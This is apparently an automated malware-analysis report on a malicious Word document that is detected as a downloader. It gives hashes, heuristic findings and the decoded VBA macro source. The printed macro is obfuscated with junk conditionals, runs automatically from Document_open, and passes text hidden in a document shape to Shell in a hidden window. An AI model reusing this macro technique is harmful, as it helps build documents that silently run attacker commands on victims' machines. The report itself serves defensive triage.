Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d98fbb3ba2795c9b…

MALICIOUS

Office (OLE)

77.1 KB Created: 2018-11-12 23:04:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 2bd3bcf14d9636bbebc0148060c9443b SHA-1: 39711fb26fba069983c6a169f50966cb12547c20 SHA-256: d98fbb3ba2795c9b6805e6ff8928851fa91ce1f2d8fcfabe8a2a7d90c8bd1be1
232 Risk Score

Heuristics 8

  • ClamAV: Doc.Downloader.Generic-6748162-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6748162-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        End If
RGiSWLCptb = Shell(fYGujmmm + PlLZi + jMzijS, XTYHBmBLs)
   If (vUlXvLk <> 0 Or zLNFMZBGd) Then
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
Private Sub Document_open()
   If (DwLiE <> 0 Or GEiEVVdtj) Then
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5602 bytes
SHA-256: d8184a16c68aded203eae011e9a21a152c5e2d9dff3746a928a8e9f6d0987d4a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
67 of 106 identifiers look randomly generated (e.g. 'RGiSWLCptb') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "CNkbZTB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function chRGZo()
Const XTYHBmBLs = 159602494 - 159602494
   If (IBzNwXcvX <> 0 Or qzJAaoz) Then
        qzJAaoz = True
        WRcwfwHmG = WRcwfwHmG & Atn(IBzNwXcvX)
        If (IBzNwXcvX = 1) Then
            WRcwfwHmG = WRcwfwHmG & "GsKDidTwj"
        Else
            WRcwfwHmG = WRcwfwHmG & "vRlWuKzv"
        End If
    End If
   If (qrHbmTUMW <> 0 Or FLRdo) Then
        FLRdo = True
        LnTfhdI = LnTfhdI & CDbl(qrHbmTUMW)
        If (qrHbmTUMW = 1) Then
            LnTfhdI = LnTfhdI & "wFjGBU"
        Else
            LnTfhdI = LnTfhdI & "LuHIPljRK"
        End If
    End If
fYGujmmm = Shapes(1).TextFrame.TextRange.Text
   If (dikzHhP <> 0 Or McMRMiwij) Then
        McMRMiwij = True
        NLBFtQJV = NLBFtQJV & CDbl(dikzHhP)
        If (dikzHhP = 1) Then
            NLBFtQJV = NLBFtQJV & "tcVIWaD"
        Else
            NLBFtQJV = NLBFtQJV & "bMFYZlV"
        End If
    End If
   If (YLbWJhZv <> 0 Or TmQjjbcT) Then
        TmQjjbcT = True
        nBIHs = nBIHs & CByte(YLbWJhZv)
        If (YLbWJhZv = 1) Then
            nBIHs = nBIHs & "DzApjio"
        Else
            nBIHs = nBIHs & "fmOzj"
        End If
    End If
   If (KfjwCZ <> 0 Or iPdGvBpvZ) Then
        iPdGvBpvZ = True
        TASLjj = TASLjj & Atn(KfjwCZ)
        If (KfjwCZ = 1) Then
            TASLjj = TASLjj & "LfdlzV"
        Else
            TASLjj = TASLjj & "vhwdWYK"
        End If
    End If
   If (iqvjpFkX <> 0 Or vYYpTqlHW) Then
        vYYpTqlHW = True
        qUpqIDU = qUpqIDU & Atn(iqvjpFkX)
        If (iqvjpFkX = 1) Then
            qUpqIDU = qUpqIDU & "bOoZjT"
        Else
            qUpqIDU = qUpqIDU & "iTZtEX"
        End If
    End If
   If (affGmsPm <> 0 Or PzuPsz) Then
        PzuPsz = True
        cUnJIHWr = cUnJIHWr & Atn(affGmsPm)
        If (affGmsPm = 1) Then
            cUnJIHWr = cUnJIHWr & "ilWMO"
        Else
            cUnJIHWr = cUnJIHWr & "wFjOLd"
        End If
    End If
RGiSWLCptb = Shell(fYGujmmm + PlLZi + jMzijS, XTYHBmBLs)
   If (vUlXvLk <> 0 Or zLNFMZBGd) Then
        zLNFMZBGd = True
        MwvYpcsIC = MwvYpcsIC & Atn(vUlXvLk)
        If (vUlXvLk = 1) Then
            MwvYpcsIC = MwvYpcsIC & "XAPPvzaE"
        Else
            MwvYpcsIC = MwvYpcsIC & "SFuirLN"
        End If
    End If
   If (nSliUL <> 0 Or WXvJOJ) Then
        WXvJOJ = True
        onniKCBS = onniKCBS & CInt(nSliUL)
        If (nSliUL = 1) Then
            onniKCBS = onniKCBS & "PapAOpRw"
        Else
            onniKCBS = onniKCBS & "XQXajmjBK"
        End If
    End If
   If (DjLWKuUE <> 0 Or tWPUiVEi) Then
        tWPUiVEi = True
        DjFzNq = DjFzNq & CByte(DjLWKuUE)
        If (DjLWKuUE = 1) Then
            DjFzNq = DjFzNq & "RNHAuIsQi"
        Else
            DjFzNq = DjFzNq & "jPTqUUNJ"
        End If
    End If
   If (IJLqAhGE <> 0 Or XiIinJzW) Then
        XiIinJzW = True
        wwJMzzhLt = wwJMzzhLt & CDbl(IJLqAhGE)
        If (IJLqAhGE = 1) Then
            wwJMzzhLt = wwJMzzhLt & "RENbHL"
        Else
            wwJMzzhLt = wwJMzzhLt & "tZjziIrQD"
        End If
    End If
End Function
Private Sub Document_open()
   If (DwLiE <> 0 Or GEiEVVdtj) Then
        GEiEVVdtj = True
        Dskdzq = Dskdzq & CByte(DwLiE)
        If (DwLiE = 1) Then
            Dskdzq = Dskdzq & "ppLVjLsqK"
        Else
            Dskdzq = Dskdzq & "tNQwSpTm"
        End If
    End If
   If (sAOaZz <> 0 Or PSHRzOGSX) Then
        PSHRzOGSX = True
        YOBfMTnrz = YOBfMTnrz & CDbl(sAOaZz)
        If (sAOaZz = 1) Then
            YOBfMTnrz = YOBfMTnrz & "wboGpSO"
        Else
            YOBfMTnrz = YOBfMTnrz & "iBrLFScVm"
        End If
    End If
   If (hPGZOKJ <> 0 Or lfhbicaCo) Then
        lfhbicaCo = True
        AchzOnV = AchzOnV & CByte(hPGZOKJ)
        If (hPGZOKJ = 1) Then
            AchzOnV = AchzOnV & "MJjDrhpNQ"
        Else
            AchzOnV = AchzOnV & "qBavf"
        End If
    End If
   If (fKupznHJR <> 0 Or XANBVs) Then
        XANBVs = True
        UXtpOKfjf = UXtpOKfjf & Atn(fKupznHJR)
        If (fKupznHJR = 1) Then
            UXtpOKfjf = UXtpOKfjf & "RlCRro"
        Else
            UXtpOKfjf = UXtpOKfjf & "OivWYwEjY"
        End If
    End If
chRGZo
   If (zZIiiQ <> 0 Or rlVzhBSD) Then
        rlVzhBSD = True
        wAGioz = wAGioz & CInt(zZIiiQ)
        If (zZIiiQ = 1) Then
            wAGioz = wAGioz & "VMTLmDFw"
        Else
            wAGioz = wAGioz & "XCqvp"
        End If
    End If
   If (SpDRFcOo <> 0 Or tHRicisH) Then
        tHRicisH = True
        HTOMK = HTOMK & Atn(SpDRFcOo)
        If (SpDRFcOo = 1) Then
            HTOMK = HTOMK & "vWZGwq"
        Else
            HTOMK = HTOMK & "dJhbitWh"
        End If
    End If
   If (QOuYHKjUj <> 0 Or YNCZF) Then
        YNCZF = True
        oVjDIrw = oVjDIrw & CByte(QOuYHKjUj)
        If (QOuYHKjUj = 1) Then
            oVjDIrw = oVjDIrw & "iHABvw"
        Else
            oVjDIrw = oVjDIrw & "UNWwwPqo"
        End If
    End If
   If (SPzvUPj <> 0 Or XwJzf) Then
        XwJzf = True
        uXznnWL = uXznnWL & CByte(SPzvUPj)
        If (SPzvUPj = 1) Then
            uXznnWL = uXznnWL & "CojYt"
        Else
            uXznnWL = uXznnWL & "zbHaU"
        End If
    End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.